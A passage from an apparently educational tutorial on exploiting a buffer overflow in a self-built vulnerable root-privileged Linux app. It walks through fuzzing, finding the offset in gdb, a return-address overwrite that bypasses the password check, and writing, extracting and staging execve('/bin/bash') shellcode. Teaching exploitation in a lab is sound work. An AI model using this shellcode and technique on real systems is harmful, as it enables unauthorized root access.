run with root privileges (which is required to read the file created on lines 33 and 34). Lastly confirmation that the file is not readable by the user that runs the application is on lines 48 and 49./p h2Testing The App / Finding The Vulnerability/h2 pFirst we need to use the application to figure out its inputs and see how the application acts normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"testuser@dev:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pAs we can see, when we enter the wrong password the applications exit code is code1/code, let's try fuzzing this input to look for a buffer overflow, here is a simple python script that can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"os/span/span span class="code-line"span class="kn"from/span span class="nn"subprocess/span span class="kn"import/span span class="n"Popen/spanspan class="p",/span span class="n"PIPE/span/span span class="code-line"/span span class="code-line"span class="n"count/spanspan class="o"=/spanspan class="mi"0/span span class="c1"# store the number when we cause a crash/span/span span class="code-line"/span span class="code-line"span class="k"for/span span class="n"i/span span class="ow"in/span span class="nb"range/spanspan class="p"(/spanspan class="mi"5000/spanspan class="p"):/span span class="c1"# loop through the numbers from 0 to 5000/span/span span class="code-line" span class="c1"# and use i as the incrementor/span/span span class="code-line"/span span class="code-line" span class="c1"# execute the file ./app with the argument quot;Aquot;*i so we keep/span/span span class="code-line" span class="c1"# increasing the number of A#39;s by 1/span/span span class="code-line" span class="n"process/span span class="o"=/span span class="n"Popen/spanspan class="p"([/spanspan class="s2"quot;./appquot;/spanspan class="p",/span span class="s2"quot;Aquot;/spanspan class="o"*/spanspan class="n"i/spanspan class="p"],/span span class="n"stdin/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p",/span span class="n"stdout/spanspan class="o"=/spanspan class="n"PIPE/spanspan class="p")/span/span span class="code-line" span class="p"(/spanspan class="n"output/spanspan class="p",/span span class="n"err/spanspan class="p")/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"communicate/spanspan class="p"()/span/span span class="code-line"/span span class="code-line" span class="n"exit_code/span span class="o"=/span span class="n"process/spanspan class="o"./spanspan class="n"wait/spanspan class="p"()/span span class="c1"# wait for the programs exit code/span/span span class="code-line" span class="k"if/span span class="n"exit_code/span span class="o"!=/span span class="mi"1/spanspan class="p":/span span class="c1"# if its not = 1/span/span span class="code-line" span class="n"count/span span class="o"=/span span class="n"i/span span class="c1"# set the count to i/span/span span class="code-line" span class="k"break/span span class="c1"# and break out of the loop/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="nb"print/span span class="n"count/span span class="c1"# print the number of A#39;s it took to crash it/span/span span class="code-line"/code/pre/div /td/tr/table pRunning the python script gives us:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-fuzz.py/span span class="code-line"span class="go"524/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo the python script crashed the application by inserting 524 A's as its input. Just because we crashed the application it doesn't mean we took control of the applications execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes)./p pWe will use codegdb/code to do this. The hex for codeA/code is code41/code, you can figure this out using the ascii man page (a href="http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7" target="_blank"man ascii/a), so what we are looking for is when the application crashes it should be trying to run code41414141/code (as this is a 32 bit system, each instruction is 32 bits long or 4 bytes):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 524#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 528#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xbffff970 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app $(python -c #39;print quot;Aquot; * 532#39;)/span/span span class="code-line"/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table pWe increase the number of bytes by 4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is code0x41414141/code (on line 21) which is just codeAAAA/code./p pI'm going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we'll use codegdb/code for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;putchar@pltgt;/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pI use the code-q/code option to codegdb/code to supress the informational message that it normally splits out on started, I then set the disassembly flavor to codeintel/code format because codegdb/code defaults to ATamp;T format and I prefer intel./p pThe call to codeprintfile/code on line 41 looks like a good choice to jump to and as we can see it is at address code0x0804869b/code. All we need to do is put this address in, in reverse due to a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a, after 528 bytes, heres how:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x9b\x86\x04\x08quot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pWe still get a segmentation fault but it outputs the contents of the file meaning we've circumvented the password protection./p h2Developing Shellcode / Improving Exploitation/h2 pNow I'm going to show you how to use this to run your own code as root. First we need some code to run. I've written a quick a href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"assembly/a application in a href="http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html?iid=tech_vt_tech+64-32_manuals" target="_blank"IA32 format/a which just runs the execve a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a with /bin/bash as its argument (for more information on execve itself see a href="http://linux.die.net/man/2/execve" target="_blank"man execve/a):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nv"short/spanspan class="w" /spanspan class="nv"Call_shellcode/spanspan class="w" /spanspan class="c1"; jump to where our string is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"pop/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; pop the address of our string into ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; which is the first argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out the eax register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="nb"al/spanspan class="w" /spanspan class="c1"; put a 0 where the A is to null/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; terminate the /bin/bash string/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; put a pointer to the beginning/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; of the string where the BBBB is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out the ecx register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; replace the CCCC with 0000/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to BBBB into ecx the second/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to CCCC into edx the third/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"call/spanspan class="w" /spanspan class="nv"shellcode/spanspan class="w" /spanspan class="c1"; call the start of the actual application/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"shell:/spanspan class="w" /spanspan class="kd"db/spanspan class="w" /spanspan class="s"quot;/bin/bashABBBBCCCCquot;/spanspan class="w" /spanspan class="c1"; our string of/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; arguments to execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pA system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running codeint 0x80/code to execute the system call. To find the sys call number do this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangrep execve /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_execve span class="m"11/span/span span class="code-line"/code/pre/div /td/tr/table pThis means execve is 11 or 0xb in hex./p pIn this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o shell.o shell.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o shell shell.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./shellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"/code/pre/div /td/tr/table pWe have shellcode now but we should test it to make sure it works, the following C application can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"code/spanspan class="p"[]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /span\/span span class="code-line"span class="s"quot;/spanspan class="se"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="err"\/spanspan class="n"x62/spanspan class="err"\/spanspan class="n"x61/spanspan class="err"\/spanspan class="n"x73/spanspan class="err"\/spanspan class="n"x68/spanspan class="err"\/spanspan class="n"x41/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="s"quot;;/span/span span class="code-line"/span span class="code-line"span class="n"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Shellcode Length: %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"code/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"ret/spanspan class="p")()/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p"(/spanspan class="o"*/spanspan class="p")())/spanspan class="n"code/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"ret/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've split it up onto multiple lines here for readability. Compiling it and running it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 49/span/span span class="code-line"span class="gp"testuser@dev:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pIt worked, the application codeshellcode/code just sets the return value of the main function to the address of the beginning of our shellcode which run's it because you can't just run it manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./shell/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use a href="http://linux.die.net/man/3/getenv" target="_blank"getenv/a to get its address, here is how we put it into an environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"/code/pre/div /td/tr/table pHere is another C application that we can use to get the address of an environment variable in the memory of another application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span 